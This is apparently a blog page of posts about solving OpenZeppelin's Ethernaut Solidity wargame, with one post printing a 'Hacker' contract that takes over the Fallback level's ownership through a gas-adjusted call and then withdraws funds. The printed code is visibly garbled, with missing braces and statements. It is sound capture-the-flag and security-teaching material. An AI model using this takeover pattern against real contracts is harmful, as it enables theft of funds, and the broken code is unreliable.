Solidity tx.origin vs msg.sender
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Completed Ethernaut Solidity Wargame

Finally, I have completed 22 levels of OpenZeppelin Ethernaut Solidity wargame.I have done these games in a different way, rather than working in broswer’s console.I created a GitHub repository for each level, and then made Hacker contract, doing experiments.Thus, in my Github, for each game, it has the target contract which is vulnerable, the hacker contract as well as test scripts.I wrote every README including knowledge that helps to solve games, and security considerations you should avoid in practice.Until Dex level was done, it took almost a month or so.Through the games, I could learn really interesting and critical security risks. Additionally, I could learn about how each Solidity version covers that risks.The most challenging levels were “Alien Codex” and “MagicNumber”. You can browse the game solutions and hacking contracts, also you can be a hacker by following my step-by-step guide.
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Re-entrancy Attack

You’ve heard a lot about Re-entrancy attack, and the famous DAO hacking case that caused Ethereum hard fork. I got some questions for you.– Are you sure about that your smart contract never gets destroyed by a Re-entrancy attack?– Have you ever made & experiment a hacking contract that do a Re-entrancy attack?– Did you find that the experiment wouldn’t work in Solidity v0.8? I made a Solidity game, that would give you the answers clearly. Any interaction from a contract (A) with another contract (B) and any transfer of Ether hands over control to that contract (B). This makes it possible for B to call back into A before this interaction is completed. In this game, you will be a hacker in order to steal all the funds from a contract. Through this, you will learn “CEI” pattern to keep your contract safe from Re-entrancy, as well as an important breaking change in Solidity v0.8 that prevents Re-entrancy in another way. Github:
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The true meaning of Solidity private variable
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Coin Flip game you never lose
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Why do you use linter?

Last week, I put a solidity game - Fallback Attack, so everyone can hack it on a test net.

This time I made a next level - Fallout Attack, you may need to send SOS to our Jesus of developers.

Enjoy it to hack! Ciao!

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Gas Adjustment – One of the differences between `call` vs `transfer`/`send` in Solidity

A few days ago, I inspired by the Solidity wargame - Ethernaut designed by OpenZeppelin, and decided to make a hacker contract to attack Fallback contract automatically.

Fallback is one of the levels designed in Ethernaut.

I thought that it would be very easy before I started, but when I tested the completed hacker contract, I couldn't even imagine that I would spend a whole day to finish because of one of the important knowledge that was related to gas.

Here is the completed source code of Hacker contract.

// SPDX-License-Identifier: MIT
pragma solidity >=0.8.5 <0.9.0;

interface FallbackInterface {
  function contribute() external payable;
  function withdraw() external;

contract Hacker {

  address payable public hacker;

  constructor() {
    hacker = payable(msg.sender);

  modifier onlyHacker {
      msg.sender == hacker,
      "caller is not the hacker"

  function attack(address _target) external payable onlyHacker {
      msg.value > (0.001 ether), 
      "Not enough ether to attack."

    uint contributionFee = 0.0005 ether;

    // 0. Get the target contract.
    FallbackInterface fallbackInstance = FallbackInterface(_target);

    // 1. Contribute with ether less than 0.001.
    fallbackInstance.contribute{value: contributionFee}();

    // 2. Send Transaction to claim owner, should set the gas as enough as the target contract is able to modify owner.
    (bool result,) = payable(_target).call{gas: 100000, value: address(this).balance}("");
    if (result) {

    // 3. Withdraw all ether

    // 4. Put back into my pocket.

  // With it, it can receive ether from the target contract.
  receive() external payable {}


Please walk though my github repository to see the source code that helps you understand things.

You could find the code line that uses call function instead of transfer or send in order to send ether to the target contract in Hacker.sol. In many documents, call is dangerous, and needs care about using it. And I do recommend not to use it for your real smart contract. ?

One of the important differences between call and transfer or send, is that when using call, you can set the amount of gas that will be available in the transaction generated by call call.

The call in Hacker contract will call fallback function in Fallback contract.

Look at that fallback function, and try to predict how many gas it would need? Here are some Ethereum specifications that help you to calculate it.

To occupy a 256 Bit slot of Storage costs 20,000 gas. Changing a value of an already occupied slot costs 5,000 gas.

In the fallback function, it replaces the owner with the new one, and the owner is a state variable that stores on Storage. Then you can easily get the amount of gas required for the fallback function as roughly more than 25,000 gas.

But trasfer and send functions are limited with 2300 gas stipend and not adjustable. ? So, if you attack with transfer or send, you will get "Out of Gas" exception, and in many cases, Remix, truffle and etc, they don't give the exact error description. (It's secret that I spent a whole day to find the reason for the exception.)

With call you can adjust the amount gas used in the called contract, and the sufficient amount of gas will allow the target contract to replace the owner, ultimately you will get success on the attack.

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Cryptozombies Ethereum Oracle Course

Through the weekend, I completed Cryptozombies Oracle lessons.In the lessons, you can learn about building smart contracts and building decentralized Oracle.
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